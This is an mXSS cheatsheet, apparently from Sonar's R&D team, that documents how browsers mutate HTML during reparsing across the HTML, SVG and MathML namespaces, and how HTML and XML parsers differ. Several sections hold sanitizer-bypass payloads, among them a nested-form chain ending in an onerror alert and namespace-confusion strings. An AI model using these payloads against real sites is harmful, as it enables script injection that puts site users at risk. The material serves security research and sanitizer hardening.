mXSS cheatsheet

This cheatsheet is your one-stop shop for diving deep into the fascinating world of mXSS (mutations caused by browser quirks in HTML parsing). Forget sifting through the official 1500~ page spec – here’s a curated list of examples that showcase these unexpected behaviors.

Contributions to this list are very welcome. Feel free to open issues on the repository if you would like to see more information on a specific topic, or a pull request if you are already aware of additional information. Links to public write-ups are appreciated when adding info.

The project is maintained by the Sonar R&D team. Find XSS in your code (and much more) with SonarCloud, free for open-source projects!

HTML namespace

select

Unwanted elements in select will get deleted, <select><a> → <select>
Aside from <select>, <input>, <keygen> and <textarea>: <select><style><input><a> → <select></select><input><a></a>

form

Cant have other form descendants, <form id=form1>INSIDE_FORM1<form id=form2>INSIDE_FORM2 → <form id="form1">INSIDE_FORM1 INSIDE_FORM2</form>
Bypass, <form id="outer"><div></form><form id="inner"><input> → <form id="outer"><div><form id="inner"><input></form></div></form> → <form id="outer"><div><input></div></form>
Can craft payloads that will mutate even after the second reparsing: <form id="outer"><math><mtext></form><form id="inner"><mglyph><svg><mtext><form id="outer"><mi></form><form id="inner"><mglyph><desc><xmp><img src=x onerror=alert(1)>

table

Will move disallowed elements before, <table><a> → <a></a><table></table>
Can be used to enclose disallowed elements in one another
- <p><table><xmp> → <p><xmp></xmp><table></table></p> → <p></p><xmp></xmp><table></table>
- <a><mglyph><table><a> → <a><mglyph><a></a><table></table></mglyph></a> → <a><mglyph></mglyph><a></a><table></table></a>
- <p><table><ul> → <p><ul></ul><table></table></p> → <p></p><ul></ul><table></table><p></p>
- And more…
Table elements such as tbody, tr,and td will be removed outside of the table

a

Cannot be the child of another a element. Bypass via table element: <a id=1><table><a id=2> → <a id="1"><a id="2"></a><table></table></a> → <a id="1"></a><a id="2"></a><table></table>
Also <a id=1><audio>aa<altglyphdef><animatecolor><filter><fieldset><a id=2></fieldset></a>

headings

Headers cant be direct childs e.g: <h1><h2> → <h1></h1><h2></h2>
Bypass, <h1><a><h2></a> → <h1><a></a><h2><a></a></h2></h1> → <h1><a></a></h1><h2><a></a></h2>

noscript

Parsed differently when js is enabled or disabled. When parsing via DOMParser scripting is disabled
Js enabled, <noscript><a> → <noscript><a></noscript>
Js disabled, <noscript><a> → <noscript><a></a></noscript>

br and p

Are the only elements that can be created with an end tag, </p> → <p></p>
Elements that end a p element: address, article, aside, blockquote, center, details, dialog, dir, div, dl, fieldset, figcaption, figure, footer, header, hgroup, main, menu, nav, ol, p, search, section, summary, ul, pre, listing, plaintext

plaintext

plaintext can’t be closed in HTML namespace but <table><plaintext><a> → <plaintext><a></plaintext><table></table> table will execute

textarea

Content will get decoded
Comments will not be parsed in textarea: <textarea></textarea>

Active formatting elements

List of elements: a, b, big, code, em, font, i, nobr, s, small, strike, strong, tt, and u
Active formatting elements might get duplicated during parsing roundtrips when the DOM tree changes - the-list-of-active-formatting-elements
For example: <li><a><table><li>t → <li><a><li>t</li><table></table></a></li> → <li><a></a></li><li><a>t</a></li><table></table>

NULL byte

Will change to chr at 65533 in an element name

a=new window.DOMParser().parseFromString(`<a\x00 id="test">`,"text/html");
a.querySelector(`#test`).tagName.substr(1).charCodeAt() == 65533;
>>> true

is attribute

The is attribute does not get deleted when serializing

a=new DOMParser().parseFromString('<a is="to-delete">', "text/html");
a.body.firstChild.removeAttribute("is");
a.getRootNode().body.firstChild;
>>> <a>​</a>​
a.getRootNode().body.firstChild.outerHTML;
>>> '<a is="to-delete"></a>'

comments

When a comment is incorrectly-opened (<!, </, <?, <!-) the first following occurrence of greater than > will close the comment:
```
<! comment > outside of comment

```

SVG namespace

HTML integration points

foreignObject, desc, and title elements

image element

image is allowed in svg but in HTML it will change to img, which is a foreign content breaker

MATHML namespace

HTML integration points

mi, mo, mn, ms, and mtext elements

annotation-xml element

Can embed SVG namespace in MathML only if it’s a direct descendant of annotation-xml, or in an HTML integration point: <math><annotation-xml><svg> But not <math><annotation-xml><x><svg>
Can be a text integration point if the encoding attribute is set to text/html

`mglyph`/`malignmark` elements

If either one of the mglyph or malignmark tags is a direct descendant of HTML integration point, the element (and its descendant) will be in MATHML namespace

Foreign content breakers

The following tags

b, big, blockquote, body, br, center, code, dd, div, dl, dt, em, embed, h1, h2, h3, h4, h5, h6, head, hr, i, img, li, listing, menu, meta, nobr, ol, p, pre, ruby, s, small, span, strong, strike, sub, sup, table, tt, u, ul, var

The `font` element

Is considered “Breaking foreign content tags” only with one of the attributes named color, face, or size

The `head` and `body` element

Are also content breakers and disappear when rendering in the body, e.g.: <svg><body><a> → <svg></svg><a></a>

Browser specific

Document fragment parsing

JavaScript functions that use fragment parsing innerHTML, insertAdjacentHTML, etc.
Non-fragment parsing examples iframe’s srcdoc, document rendering
Firefox <svg><div> → <svg><div></div></svg> (not only div but rather all breaking foreign content elements)
Others <svg><div> → <svg></svg><div></div> (same expected)

HTML5 vs HTML4 / XML

RCDATA/RAWTEXT elements

HTML introduced RCDATA/RAWTEXT type elements meaning if the sanitizer is using XML style parser, an attacker can use payload as such to bypass the sanitization <noframes><style></noframes><xss></style></noframes>

Comments

According to the XML specification (XHTML), comments must end with the characters —>. On the other hand, the HTML specification states that a comment’s text “must not start with the string >, nor start with the string ->”.
```
Input: <p></p>
HTML4 output: 
```
This can be done with either .

Foreign content elements

HTML5 introduced two foreign elements (math and svg) which follow different parsing specifications than HTML. Again parsing with PHP doesn’t take it into account, causing other parsing differentials and sanitizers bypass such as: <svg><p><style></style>

DOCTYPE element

The !DOCTYPE element in XML/XHTML is more complex allowing more characters and element nesting than in HTML5. In contrast, the HTML doctype ends with the first occurrence of the “greater than” sign >. The following payload can be used if the parser doesn’t follow HTML5’s DOCTYPE rules:
```
<!DOCTYPE HTML PUBLIC "-//W3C//DTDHTML4.01//EN" "><xss>">
<!DOCTYPE HTML SYSTEM "><xss>">
```

Element name starting with underscrool

According to the XML specification “Element names must start with a letter or underscore”, unlike HTML where tags must start with ASCII alphanumerics.
```
Input: <p><_test>/<p>
HTML output: <p>&lt;_test/&gt;/<p>
XML output: <p><_test/>/<p>
```

Processing instruction

XML has implemented Processing Instruction while HTML will create a comment if ? follows an open tag chr <. The following payload can be used: <?x --><xss> ?> if the sanitizer accepts PI.

mXSS cheatsheet 🧬🔬

HTML namespace

br and p

NULL byte

is attribute

SVG namespace

HTML integration points

image element

MATHML namespace

HTML integration points

annotation-xml element

mglyph/malignmark elements

Foreign content breakers

The following tags

The font element

The head and body element

Browser specific

Document fragment parsing

HTML5 vs HTML4 / XML

RCDATA/RAWTEXT elements

Comments

Foreign content elements

DOCTYPE element

Element name starting with underscrool

Processing instruction

Entities decoding

In the content of noscript

In the content of style only in svg/mathML namespaces

Documentation links

Integration points: HTML Standard

Breaking foreign content tags: HTML Standard

RCDATA/RAWTEXT elements: HTML Standard

Serializing HTML fragments: HTML Standard

Element types: HTML Standard

`mglyph`/`malignmark` elements

The `font` element

The `head` and `body` element

In the content of `style` only in `svg`/`mathML` namespaces